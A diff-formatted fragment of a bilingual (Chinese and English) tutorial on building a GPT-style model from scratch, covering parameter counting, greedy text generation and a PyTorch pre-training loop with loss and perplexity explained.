||||
# shape: (seq_len, emb_dim)
|
||||
|
||||
# Add token and positional embeddings
|
||||
x = tok_embeds + pos_embeds # Broadcasting over batch dimension
|
||||
# x shape: (batch_size, seq_len, emb_dim)
|
||||
|
||||
x = self.drop_emb(x) # Dropout applied
|
||||
# x shape remains: (batch_size, seq_len, emb_dim)
|
||||
|
||||
x = self.trf_blocks(x) # Pass through Transformer blocks
|
||||
# x shape remains: (batch_size, seq_len, emb_dim)
|
||||
|
||||
x = self.final_norm(x) # Final LayerNorm
|
||||
# x shape remains: (batch_size, seq_len, emb_dim)
|
||||
|
||||
logits = self.out_head(x) # Project to vocabulary size
|
||||
# logits shape: (batch_size, seq_len, vocab_size)
|
||||
|
||||
return logits # Output shape: (batch_size, seq_len, vocab_size)
|
||||
```
|
||||
#### **目的和功能**
|
||||
|
||||
- **嵌入层:**
|
||||
- **令牌嵌入 (`tok_emb`):** 将令牌索引转换为嵌入。作为提醒,这些是赋予词汇中每个令牌每个维度的权重。
|
||||
- **位置嵌入 (`pos_emb`):** 向嵌入添加位置信息,以捕捉令牌的顺序。作为提醒,这些是根据令牌在文本中的位置赋予的权重。
|
||||
- **丢弃 (`drop_emb`):** 应用于嵌入以进行正则化。
|
||||
- **变换器块 (`trf_blocks`):** 一组 `n_layers` 变换器块,用于处理嵌入。
|
||||
- **最终归一化 (`final_norm`):** 在输出层之前的层归一化。
|
||||
- **输出层 (`out_head`):** 将最终隐藏状态投影到词汇大小,以生成预测的 logits。
|
||||
|
||||
> [!NOTE]
|
||||
> 该类的目标是使用所有其他提到的网络来**预测序列中的下一个令牌**,这对于文本生成等任务至关重要。
|
||||
>
|
||||
> 注意它将**使用尽可能多的变换器块**,并且每个变换器块使用一个多头注意力网络,一个前馈网络和几个归一化。因此,如果使用12个变换器块,则将其乘以12。
|
||||
>
|
||||
> 此外,在**输出**之前添加了一个**归一化**层,并在最后应用一个最终线性层以获得具有适当维度的结果。注意每个最终向量的大小与使用的词汇相同。这是因为它试图为词汇中的每个可能令牌获取一个概率。
|
||||
|
||||
## 训练的参数数量
|
||||
|
||||
定义了GPT结构后,可以找出要训练的参数数量:
|
||||
```python
|
||||
GPT_CONFIG_124M = {
|
||||
"vocab_size": 50257, # Vocabulary size
|
||||
"context_length": 1024, # Context length
|
||||
"emb_dim": 768, # Embedding dimension
|
||||
"n_heads": 12, # Number of attention heads
|
||||
"n_layers": 12, # Number of layers
|
||||
"drop_rate": 0.1, # Dropout rate
|
||||
"qkv_bias": False # Query-Key-Value bias
|
||||
}
|
||||
|
||||
model = GPTModel(GPT_CONFIG_124M)
|
||||
total_params = sum(p.numel() for p in model.parameters())
|
||||
print(f"Total number of parameters: {total_params:,}")
|
||||
# Total number of parameters: 163,009,536
|
||||
```
|
||||
### **逐步计算**
|
||||
|
||||
#### **1. 嵌入层:标记嵌入和位置嵌入**
|
||||
|
||||
- **层:** `nn.Embedding(vocab_size, emb_dim)`
|
||||
- **参数:** `vocab_size * emb_dim`
|
||||
```python
|
||||
token_embedding_params = 50257 * 768 = 38,597,376
|
||||
```
|
||||
- **层:** `nn.Embedding(context_length, emb_dim)`
|
||||
- **参数:** `context_length * emb_dim`
|
||||
```python
|
||||
position_embedding_params = 1024 * 768 = 786,432
|
||||
```
|
||||
**总嵌入参数**
|
||||
```python
|
||||
embedding_params = token_embedding_params + position_embedding_params
|
||||
embedding_params = 38,597,376 + 786,432 = 39,383,808
|
||||
```
|
||||
#### **2. Transformer Blocks**
|
||||
|
||||
有12个transformer块,因此我们将计算一个块的参数,然后乘以12。
|
||||
|
||||
**每个Transformer块的参数**
|
||||
|
||||
**a. 多头注意力**
|
||||
|
||||
- **组件:**
|
||||
- **查询线性层 (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
|
||||
- **键线性层 (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
|
||||
- **值线性层 (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
|
||||
- **输出投影 (`out_proj`):** `nn.Linear(emb_dim, emb_dim)`
|
||||
- **计算:**
|
||||
|
||||
- **每个 `W_query`, `W_key`, `W_value`:**
|
||||
|
||||
```python
|
||||
qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824
|
||||
```
|
||||
|
||||
由于有三个这样的层:
|
||||
|
||||
```python
|
||||
total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
|
||||
```
|
||||
|
||||
- **输出投影 (`out_proj`):**
|
||||
|
||||
```python
|
||||
out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592
|
||||
```
|
||||
|
||||
- **总多头注意力参数:**
|
||||
|
||||
```python
|
||||
mha_params = total_qkv_params + out_proj_params
|
||||
mha_params = 1,769,472 + 590,592 = 2,360,064
|
||||
```
|
||||
|
||||
**b. 前馈网络**
|
||||
|
||||
- **组件:**
|
||||
- **第一线性层:** `nn.Linear(emb_dim, 4 * emb_dim)`
|
||||
- **第二线性层:** `nn.Linear(4 * emb_dim, emb_dim)`
|
||||
- **计算:**
|
||||
|
||||
- **第一线性层:**
|
||||
|
||||
```python
|
||||
ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim)
|
||||
ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368
|
||||
```
|
||||
|
||||
- **第二线性层:**
|
||||
|
||||
```python
|
||||
ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim
|
||||
ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064
|
||||
```
|
||||
|
||||
- **总前馈参数:**
|
||||
|
||||
```python
|
||||
ff_params = ff_first_layer_params + ff_second_layer_params
|
||||
ff_params = 2,362,368 + 2,360,064 = 4,722,432
|
||||
```
|
||||
|
||||
**c. 层归一化**
|
||||
|
||||
- **组件:**
|
||||
- 每个块有两个 `LayerNorm` 实例。
|
||||
- 每个 `LayerNorm` 有 `2 * emb_dim` 参数(缩放和偏移)。
|
||||
- **计算:**
|
||||
|
||||
```python
|
||||
layer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 768 * 2 = 3,072
|
||||
```
|
||||
|
||||
**d. 每个Transformer块的总参数**
|
||||
```python
|
||||
pythonCopy codeparams_per_block = mha_params + ff_params + layer_norm_params_per_block
|
||||
params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568
|
||||
```
|
||||
**所有变换器块的总参数**
|
||||
```python
|
||||
pythonCopy codetotal_transformer_blocks_params = params_per_block * n_layers
|
||||
total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816
|
||||
```
|
||||
#### **3. 最终层**
|
||||
|
||||
**a. 最终层归一化**
|
||||
|
||||
- **参数:** `2 * emb_dim` (缩放和偏移)
|
||||
```python
|
||||
pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536
|
||||
```
|
||||
**b. 输出投影层 (`out_head`)**
|
||||
|
||||
- **层:** `nn.Linear(emb_dim, vocab_size, bias=False)`
|
||||
- **参数:** `emb_dim * vocab_size`
|
||||
```python
|
||||
pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376
|
||||
```
|
||||
#### **4. 汇总所有参数**
|
||||
```python
|
||||
pythonCopy codetotal_params = (
|
||||
embedding_params +
|
||||
total_transformer_blocks_params +
|
||||
final_layer_norm_params +
|
||||
output_projection_params
|
||||
)
|
||||
total_params = (
|
||||
39,383,808 +
|
||||
85,026,816 +
|
||||
1,536 +
|
||||
38,597,376
|
||||
)
|
||||
total_params = 163,009,536
|
||||
```
|
||||
## 生成文本
|
||||
|
||||
拥有一个像之前那样预测下一个标记的模型,只需从输出中获取最后一个标记的值(因为它们将是预测标记的值),这将是**词汇表中每个条目的值**,然后使用`softmax`函数将维度归一化为总和为1的概率,然后获取最大条目的索引,这将是词汇表中单词的索引。
|
||||
|
||||
来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb) 的代码:
|
||||
```python
|
||||
def generate_text_simple(model, idx, max_new_tokens, context_size):
|
||||
# idx is (batch, n_tokens) array of indices in the current context
|
||||
for _ in range(max_new_tokens):
|
||||
|
||||
# Crop current context if it exceeds the supported context size
|
||||
# E.g., if LLM supports only 5 tokens, and the context size is 10
|
||||
# then only the last 5 tokens are used as context
|
||||
idx_cond = idx[:, -context_size:]
|
||||
|
||||
# Get the predictions
|
||||
with torch.no_grad():
|
||||
logits = model(idx_cond)
|
||||
|
||||
# Focus only on the last time step
|
||||
# (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
|
||||
logits = logits[:, -1, :]
|
||||
|
||||
# Apply softmax to get probabilities
|
||||
probas = torch.softmax(logits, dim=-1) # (batch, vocab_size)
|
||||
|
||||
# Get the idx of the vocab entry with the highest probability value
|
||||
idx_next = torch.argmax(probas, dim=-1, keepdim=True) # (batch, 1)
|
||||
|
||||
# Append sampled index to the running sequence
|
||||
idx = torch.cat((idx, idx_next), dim=1) # (batch, n_tokens+1)
|
||||
|
||||
return idx
|
||||
|
||||
|
||||
start_context = "Hello, I am"
|
||||
|
||||
encoded = tokenizer.encode(start_context)
|
||||
print("encoded:", encoded)
|
||||
|
||||
encoded_tensor = torch.tensor(encoded).unsqueeze(0)
|
||||
print("encoded_tensor.shape:", encoded_tensor.shape)
|
||||
|
||||
model.eval() # disable dropout
|
||||
|
||||
out = generate_text_simple(
|
||||
model=model,
|
||||
idx=encoded_tensor,
|
||||
max_new_tokens=6,
|
||||
context_size=GPT_CONFIG_124M["context_length"]
|
||||
)
|
||||
|
||||
print("Output:", out)
|
||||
print("Output length:", len(out[0]))
|
||||
```
|
||||
## 参考文献
|
||||
|
||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
||||
@ -1,970 +0,0 @@
|
||||
# 6. Pre-training & Loading models
|
||||
|
||||
## Text Generation
|
||||
|
||||
In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**.
|
||||
|
||||
As in the previous examples we already predicted some tokens, it's possible to reuse that function for this purpose.
|
||||
|
||||
> [!TIP]
|
||||
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.
|
||||
|
||||
## Text Evaluation
|
||||
|
||||
In order to perform a correct training it's needed to measure check the predictions obtained for the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens.
|
||||
|
||||
In order to maximize the probability of the correct token, the weights of the model must be modified to that probability is maximised. The updates of the weights is done via **backpropagation**. This requires a **loss function to maximize**. In this case, the function will be the **difference between the performed prediction and the desired one**.
|
||||
|
||||
However, instead of working with the raw predictions, it will work with a logarithm with base n. So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (base *e*) of **7.4541e-05** is approximately **-9.5042**.\
|
||||
Then, for each entry with a context length of 5 tokens for example, the model will need to predict 5 tokens, being the first 4 tokens the last one of the input and the fifth the predicted one. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 ones were in the input the model doesn't know this) with 5 expected token and therefore 5 probabilities to maximize.
|
||||
|
||||
Therefore, after performing the natural logarithm to each prediction, the **average** is calculated, the **minus symbol removed** (this is called _cross entropy loss_) and thats the **number to reduce as close to 0 as possible** because the natural logarithm of 1 is 0:
|
||||
|
||||
<figure><img src="../../images/image (10) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233">https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233</a></p></figcaption></figure>
|
||||
|
||||
Another way to measure how good the model is is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\
|
||||
For example, a perplexity value of 48725, means that when needed to predict a token it's unsure about which among 48,725 tokens in the vocabulary is the good one.
|
||||
|
||||
## Pre-Train Example
|
||||
|
||||
This is the initial code proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb) some times slightly modify
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Previous code used here but already explained in previous sections</summary>
|
||||
|
||||
```python
|
||||
"""
|
||||
This is code explained before so it won't be exaplained
|
||||
"""
|
||||
|
||||
import tiktoken
|
||||
import torch
|
||||
import torch.nn as nn
|
||||
from torch.utils.data import Dataset, DataLoader
|
||||
|
||||
|
||||
class GPTDatasetV1(Dataset):
|
||||
def __init__(self, txt, tokenizer, max_length, stride):
|
||||
self.input_ids = []
|
||||
self.target_ids = []
|
||||
|
||||
# Tokenize the entire text
|
||||
token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})
|
||||
|
||||
# Use a sliding window to chunk the book into overlapping sequences of max_length
|
||||
for i in range(0, len(token_ids) - max_length, stride):
|
||||
input_chunk = token_ids[i:i + max_length]
|
||||
target_chunk = token_ids[i + 1: i + max_length + 1]
|
||||
self.input_ids.append(torch.tensor(input_chunk))
|
||||
self.target_ids.append(torch.tensor(target_chunk))
|
||||
|
||||
def __len__(self):
|
||||
return len(self.input_ids)
|
||||
|
||||
def __getitem__(self, idx):
|
||||
return self.input_ids[idx], self.target_ids[idx]
|
||||
|
||||
|
||||
def create_dataloader_v1(txt, batch_size=4, max_length=256,
|
||||
stride=128, shuffle=True, drop_last=True, num_workers=0):
|
||||
# Initialize the tokenizer
|
||||
tokenizer = tiktoken.get_encoding("gpt2")
|
||||
|
||||
# Create dataset
|
||||
dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)
|
||||
|
||||
# Create dataloader
|
||||
dataloader = DataLoader(
|
||||
dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, num_workers=num_workers)
|
||||
|
||||
return dataloader
|
||||
|
||||
|
||||
class MultiHeadAttention(nn.Module):
|
||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
|
||||
super().__init__()
|
||||
assert d_out % num_heads == 0, "d_out must be divisible by n_heads"
|
||||
|
||||
self.d_out = d_out
|
||||
self.num_heads = num_heads
|
||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
|
||||
|
||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs
|
||||
self.dropout = nn.Dropout(dropout)
|
||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
|
||||
|
||||
def forward(self, x):
|
||||
b, num_tokens, d_in = x.shape
|
||||
|
||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
|
||||
queries = self.W_query(x)
|
||||
values = self.W_value(x)
|
||||
|
||||
# We implicitly split the matrix by adding a `num_heads` dimension
|
||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
|
||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
|
||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
|
||||
queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
|
||||
|
||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
|
||||
keys = keys.transpose(1, 2)
|
||||
queries = queries.transpose(1, 2)
|
||||
values = values.transpose(1, 2)
|
||||
|
||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
|
||||
attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head
|
||||
|
||||
# Original mask truncated to the number of tokens and converted to boolean
|
||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
|
||||
|
||||
# Use the mask to fill attention scores
|
||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
|
||||
|
||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
|
||||
attn_weights = self.dropout(attn_weights)
|
||||
|
||||
# Shape: (b, num_tokens, num_heads, head_dim)
|
||||
context_vec = (attn_weights @ values).transpose(1, 2)
|
||||
|
||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
|
||||
context_vec = context_vec.reshape(b, num_tokens, self.d_out)
|
||||
context_vec = self.out_proj(context_vec) # optional projection
|
||||
|
||||
return context_vec
|
||||
|
||||
|
||||
class LayerNorm(nn.Module):
|
||||
def __init__(self, emb_dim):
|
||||
super().__init__()
|
||||
self.eps = 1e-5
|
||||
self.scale = nn.Parameter(torch.ones(emb_dim))
|
||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
|
||||
|
||||
def forward(self, x):
|
||||
mean = x.mean(dim=-1, keepdim=True)
|
||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
|
||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
|
||||
return self.scale * norm_x + self.shift
|
||||
|
||||
|
||||
class GELU(nn.Module):
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
|
||||
def forward(self, x):
|
||||
return 0.5 * x * (1 + torch.tanh(
|
||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
|
||||
(x + 0.044715 * torch.pow(x, 3))
|
||||
))
|
||||
|
||||
|
||||
class FeedForward(nn.Module):
|
||||
def __init__(self, cfg):
|
||||
super().__init__()
|
||||
self.layers = nn.Sequential(
|
||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
|
||||
GELU(),
|
||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
|
||||
)
|
||||
|
||||
def forward(self, x):
|
||||
return self.layers(x)
|
||||
|
||||
|
||||
class TransformerBlock(nn.Module):
|
||||
def __init__(self, cfg):
|
||||
super().__init__()
|
||||
self.att = MultiHeadAttention(
|
||||
d_in=cfg["emb_dim"],
|
||||
d_out=cfg["emb_dim"],
|
||||
context_length=cfg["context_length"],
|
||||
num_heads=cfg["n_heads"],
|
||||
dropout=cfg["drop_rate"],
|
||||
qkv_bias=cfg["qkv_bias"])
|
||||
self.ff = FeedForward(cfg)
|
||||
self.norm1 = LayerNorm(cfg["emb_dim"])
|
||||
self.norm2 = LayerNorm(cfg["emb_dim"])
|
||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
|
||||
|
||||
def forward(self, x):
|
||||
# Shortcut connection for attention block
|
||||
shortcut = x
|
||||
x = self.norm1(x)
|
||||
x = self.att(x) # Shape [batch_size, num_tokens, emb_size]
|
||||
x = self.drop_shortcut(x)
|
||||
x = x + shortcut # Add the original input back
|
||||
|
||||
# Shortcut connection for feed-forward block
|
||||
shortcut = x
|
||||
x = self.norm2(x)
|
||||
x = self.ff(x)
|
||||
x = self.drop_shortcut(x)
|
||||
x = x + shortcut # Add the original input back
|
||||
|
||||
return x
|
||||
|
||||
|
||||
class GPTModel(nn.Module):
|
||||
def __init__(self, cfg):
|
||||
super().__init__()
|
||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
|
||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
|
||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
|
||||
|
||||
self.trf_blocks = nn.Sequential(
|
||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
|
||||
|
||||
self.final_norm = LayerNorm(cfg["emb_dim"])
|
||||
self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
|
||||
|
||||
def forward(self, in_idx):
|
||||
batch_size, seq_len = in_idx.shape
|
||||
tok_embeds = self.tok_emb(in_idx)
|
||||
pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
|
||||
x = tok_embeds + pos_embeds # Shape [batch_size, num_tokens, emb_size]
|
||||
x = self.drop_emb(x)
|
||||
x = self.trf_blocks(x)
|
||||
x = self.final_norm(x)
|
||||
logits = self.out_head(x)
|
||||
return logits
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
```python
|
||||
# Download contents to train the data with
|
||||
import os
|
||||
import urllib.request
|
||||
|
||||
file_path = "the-verdict.txt"
|
||||
url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"
|
||||
|
||||
if not os.path.exists(file_path):
|
||||
with urllib.request.urlopen(url) as response:
|
||||
text_data = response.read().decode('utf-8')
|
||||
with open(file_path, "w", encoding="utf-8") as file:
|
||||
file.write(text_data)
|
||||
else:
|
||||
with open(file_path, "r", encoding="utf-8") as file:
|
||||
text_data = file.read()
|
||||
|
||||
total_characters = len(text_data)
|
||||
tokenizer = tiktoken.get_encoding("gpt2")
|
||||
total_tokens = len(tokenizer.encode(text_data))
|
||||
|
||||
print("Data downloaded")
|
||||
print("Characters:", total_characters)
|
||||
print("Tokens:", total_tokens)
|
||||
|
||||
# Model initialization
|
||||
GPT_CONFIG_124M = {
|
||||
"vocab_size": 50257, # Vocabulary size
|
||||
"context_length": 256, # Shortened context length (orig: 1024)
|
||||
"emb_dim": 768, # Embedding dimension
|
||||
"n_heads": 12, # Number of attention heads
|
||||
"n_layers": 12, # Number of layers
|
||||
"drop_rate": 0.1, # Dropout rate
|
||||
"qkv_bias": False # Query-key-value bias
|
||||
}
|
||||
|
||||
torch.manual_seed(123)
|
||||
model = GPTModel(GPT_CONFIG_124M)
|
||||
model.eval()
|
||||
print ("Model initialized")
|
||||
|
||||
|
||||
# Functions to transform from tokens to ids and from to ids to tokens
|
||||
def text_to_token_ids(text, tokenizer):
|
||||
encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
|
||||
encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
|
||||
return encoded_tensor
|
||||
|
||||
def token_ids_to_text(token_ids, tokenizer):
|
||||
flat = token_ids.squeeze(0) # remove batch dimension
|
||||
return tokenizer.decode(flat.tolist())
|
||||
|
||||
|
||||
|
||||
# Define loss functions
|
||||
def calc_loss_batch(input_batch, target_batch, model, device):
|
||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
||||
logits = model(input_batch)
|
||||
loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
|
||||
return loss
|
||||
|
||||
|
||||
def calc_loss_loader(data_loader, model, device, num_batches=None):
|
||||
total_loss = 0.
|
||||
if len(data_loader) == 0:
|
||||
return float("nan")
|
||||
elif num_batches is None:
|
||||
num_batches = len(data_loader)
|
||||
else:
|
||||
# Reduce the number of batches to match the total number of batches in the data loader
|
||||
# if num_batches exceeds the number of batches in the data loader
|
||||
num_batches = min(num_batches, len(data_loader))
|
||||
for i, (input_batch, target_batch) in enumerate(data_loader):
|
||||
if i < num_batches:
|
||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
||||
total_loss += loss.item()
|
||||
else:
|
||||
break
|
||||
return total_loss / num_batches
|
||||
|
||||
|
||||
# Apply Train/validation ratio and create dataloaders
|
||||
train_ratio = 0.90
|
||||
split_idx = int(train_ratio * len(text_data))
|
||||
train_data = text_data[:split_idx]
|
||||
val_data = text_data[split_idx:]
|
||||
|
||||
torch.manual_seed(123)
|
||||
|
||||
train_loader = create_dataloader_v1(
|
||||
train_data,
|
||||
batch_size=2,
|
||||
max_length=GPT_CONFIG_124M["context_length"],
|
||||
stride=GPT_CONFIG_124M["context_length"],
|
||||
drop_last=True,
|
||||
shuffle=True,
|
||||
num_workers=0
|
||||
)
|
||||
|
||||
val_loader = create_dataloader_v1(
|
||||
val_data,
|
||||
batch_size=2,
|
||||
max_length=GPT_CONFIG_124M["context_length"],
|
||||
stride=GPT_CONFIG_124M["context_length"],
|
||||
drop_last=False,
|
||||
shuffle=False,
|
||||
num_workers=0
|
||||
)
|
||||
|
||||
|
||||
# Sanity checks
|
||||
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
|
||||
print("Not enough tokens for the training loader. "
|
||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
||||
"increase the `training_ratio`")
|
||||
|
||||
if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
|
||||
print("Not enough tokens for the validation loader. "
|
||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
||||
"decrease the `training_ratio`")
|
||||
|
||||
print("Train loader:")
|
||||
for x, y in train_loader:
|
||||
print(x.shape, y.shape)
|
||||
|
||||
print("\nValidation loader:")
|
||||
for x, y in val_loader:
|
||||
print(x.shape, y.shape)
|
||||
|
||||
train_tokens = 0
|
||||
for input_batch, target_batch in train_loader:
|
||||
train_tokens += input_batch.numel()
|
||||
|
||||
val_tokens = 0
|
||||
for input_batch, target_batch in val_loader:
|
||||
val_tokens += input_batch.numel()
|
||||
|
||||
print("Training tokens:", train_tokens)
|
||||
print("Validation tokens:", val_tokens)
|
||||
print("All tokens:", train_tokens + val_tokens)
|
||||
|
||||
|
||||
# Indicate the device to use
|
||||
if torch.cuda.is_available():
|
||||
device = torch.device("cuda")
|
||||
elif torch.backends.mps.is_available():
|
||||
device = torch.device("mps")
|
||||
else:
|
||||
device = torch.device("cpu")
|
||||
|
||||
print(f"Using {device} device.")
|
||||
|
||||
model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
|
||||
|
||||
|
||||
|
||||
# Pre-calculate losses without starting yet
|
||||
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
|
||||
|
||||
with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
|
||||
train_loss = calc_loss_loader(train_loader, model, device)
|
||||
val_loss = calc_loss_loader(val_loader, model, device)
|
||||
|
||||
print("Training loss:", train_loss)
|
||||
print("Validation loss:", val_loss)
|
||||
|
||||
|
||||
# Functions to train the data
|
||||
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
|
||||
eval_freq, eval_iter, start_context, tokenizer):
|
||||
# Initialize lists to track losses and tokens seen
|
||||
train_losses, val_losses, track_tokens_seen = [], [], []
|
||||
tokens_seen, global_step = 0, -1
|
||||
|
||||
# Main training loop
|
||||
for epoch in range(num_epochs):
|
||||
model.train() # Set model to training mode
|
||||
|
||||
for input_batch, target_batch in train_loader:
|
||||
optimizer.zero_grad() # Reset loss gradients from previous batch iteration
|
||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
||||
loss.backward() # Calculate loss gradients
|
||||
optimizer.step() # Update model weights using loss gradients
|
||||
tokens_seen += input_batch.numel()
|
||||
global_step += 1
|
||||
|
||||
# Optional evaluation step
|
||||
if global_step % eval_freq == 0:
|
||||
train_loss, val_loss = evaluate_model(
|
||||
model, train_loader, val_loader, device, eval_iter)
|
||||
train_losses.append(train_loss)
|
||||
val_losses.append(val_loss)
|
||||
track_tokens_seen.append(tokens_seen)
|
||||
print(f"Ep {epoch+1} (Step {global_step:06d}): "
|
||||
f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
|
||||
|
||||
# Print a sample text after each epoch
|
||||
generate_and_print_sample(
|
||||
model, tokenizer, device, start_context
|
||||
)
|
||||
|
||||
return train_losses, val_losses, track_tokens_seen
|
||||
|
||||
|
||||
def evaluate_model(model, train_loader, val_loader, device, eval_iter):
|
||||
model.eval()
|
||||
with torch.no_grad():
|
||||
train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
|
||||
val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
|
||||
model.train()
|
||||
return train_loss, val_loss
|
||||
|
||||
|
||||
def generate_and_print_sample(model, tokenizer, device, start_context):
|
||||
model.eval()
|
||||
context_size = model.pos_emb.weight.shape[0]
|
||||
encoded = text_to_token_ids(start_context, tokenizer).to(device)
|
||||
with torch.no_grad():
|
||||
token_ids = generate_text(
|
||||
model=model, idx=encoded,
|
||||
max_new_tokens=50, context_size=context_size
|
||||
)
|
||||
decoded_text = token_ids_to_text(token_ids, tokenizer)
|
||||
print(decoded_text.replace("\n", " ")) # Compact print format
|
||||
model.train()
|
||||
|
||||
|
||||
# Start training!
|
||||
import time
|
||||
start_time = time.time()
|
||||
|
||||
torch.manual_seed(123)
|
||||
model = GPTModel(GPT_CONFIG_124M)
|
||||
model.to(device)
|
||||
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
|
||||
|
||||
num_epochs = 10
|
||||
train_losses, val_losses, tokens_seen = train_model_simple(
|
||||
model, train_loader, val_loader, optimizer, device,
|
||||
num_epochs=num_epochs, eval_freq=5, eval_iter=5,
|
||||
start_context="Every effort moves you", tokenizer=tokenizer
|
||||
)
|
||||
|
||||
end_time = time.time()
|
||||
execution_time_minutes = (end_time - start_time) / 60
|
||||
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
|
||||
|
||||
|
||||
|
||||
# Show graphics with the training process
|
||||
import matplotlib.pyplot as plt
|
||||
from matplotlib.ticker import MaxNLocator
|
||||
import math
|
||||
def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
|
||||
fig, ax1 = plt.subplots(figsize=(5, 3))
|
||||
